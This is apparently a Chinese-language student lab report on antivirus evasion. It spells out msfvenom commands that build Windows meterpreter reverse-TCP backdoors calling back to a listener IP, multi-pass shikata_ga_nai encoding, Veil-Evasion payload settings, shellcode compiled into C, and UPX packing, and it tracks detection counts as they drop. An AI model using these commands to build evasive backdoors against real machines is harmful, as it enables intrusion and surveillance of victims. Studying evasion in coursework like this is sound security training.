Exp3 免殺原理與實踐 20154308張珊珊

1、基礎問題回答

• 殺軟是如何檢測出惡意代碼的？
  • 根據特徵來檢測：惡意代碼經常具備明顯的特徵碼也就是一段數據，殺軟檢測到具備該特徵碼的程序就看成檢測到了惡意代碼。
  • 根據行爲來檢測：若是一個程序的行爲是帶有惡意的行爲，那麼這個程序也會被認爲是惡意代碼，有時候不是惡意代碼的程序也會把查殺，由於這些程序作了一些計算機認爲不安全的事情，比較常見的就是各自破解補丁或者遊戲外掛等。
  • 啓發式檢測：根據些片面特徵去推斷。一般是由於缺少精確斷定依據。
• 免殺是作什麼？
  • 使惡意軟件不被AV檢測出來
• 免殺的基本方法有哪些？
  • 改變特徵碼
  • 改變行爲

二.實踐過程

2.1 使用msf生成的後門程序

linux終端：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor.exe（linux的ip地址）

將生成的後門文件上傳到virscan網站掃描，發現有19個軟件都能發現

接下來咱們經過改變特徵碼的方法來實現免殺：

• 編碼一次 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor1.exe

然而並無什麼用

• 編碼十次 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor2.exe

能夠看出報毒的引擎減小到16個。效果彷佛並無那麼明顯，根據課上所學，多是由於編碼以後老是會有差很少相似的頭部來解釋如何將文件還原，而殺毒軟件恰好就利用這一特徵進行殺毒，因此仍是特徵碼的問題。

2.2 使用veil-evasion生成的後門程序

veil-Evasion是一個與Metasploit有點相似的軟件，已經在kali虛擬機裏，若是沒有能夠進行在線安裝：sudo apt-get install veil-evasion

可是我沒有成功，全部接下來的這部分實驗是用同窗的電腦完成的

在終端下輸入指令veil便可打開軟件，根據提示依次鍵入如下指令：

use python/meterpreter/rev_tcp //設置payload

set LHOST 172.30.6.226 //設置反彈鏈接IP

set port 4308 //設置反彈端口4308

generate //生成

backdoor3 //程序名

1

生成的文件能夠在 其餘位置->電腦 裏按照它提示的目錄找到

檢測以後發現報毒軟件少了不少，但仍是有。

2.3 C語言調用Shellcode

• 在Kali裏生成一個C語言格式的shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.75.130 LPORT=4308 -f c

• 而後我選擇在本身的物理機win10上編寫一個c文件，就是將講義中的代碼段替換成上面linux生成的代碼，並進行編譯。（應該在後面運行，以前沒截圖）（在這個過程當中個人360沒有給我任何報警，真是難過）

• 在linux下進入MSF打開監聽進程，跟以前作的實驗步驟同樣，這時候在win10下運行以前的c文件，這時候linux就輕易的侵入了個人電腦

試一下上次沒成功的拍照功能

此次成功了

• 接下來，咱們找到運行生成的exe文件，送去查殺

只有少數軟件報毒，和以前的19個仍是有很明顯的對比的。

再送去360看看（專門查殺這個exe文件）

真是一如既往的讓人難過，沒有任何反應。

2.4 加殼

直接用upx將以前生成的c.exe文件加殼，改個文件名

送去查殺

報毒軟件又少了一個。雖然還不太明白加殼是什麼意思，可是能看到有一點點免殺的做用。

三. 離實戰還缺些什麼技術或步驟？

• 如何將咱們製做的後門程序傳到靶機上而且讓他運行，釣魚網站作的應該就是這個事情，雖然我不會。
• 如何得到一個穩定的ip去監聽靶機。

四. 實驗總結

• 此次的實驗自己並非特別難，可是我花了很長時間在安裝veil這個軟件上，最後尚未成功，用了別人的電腦，可是不會氣餒，會繼續學習。
• 有一點點小小的遺憾是沒有去進一步想各類辦法讓更少的軟件報毒，電腦太卡或者軟件裝不上等等都是個人藉口。
• 最大的感慨是個人360安全衛士居然如此雞肋，別人的360或多或少還能察覺一點異樣。殺毒軟件的薄弱在本次實驗中一目瞭然，因此之後在網絡中要「潔身自好」，不輕易點擊不明連接，不輕易下載來歷不明的第三方軟件，定時更新病毒庫、查毒、殺毒。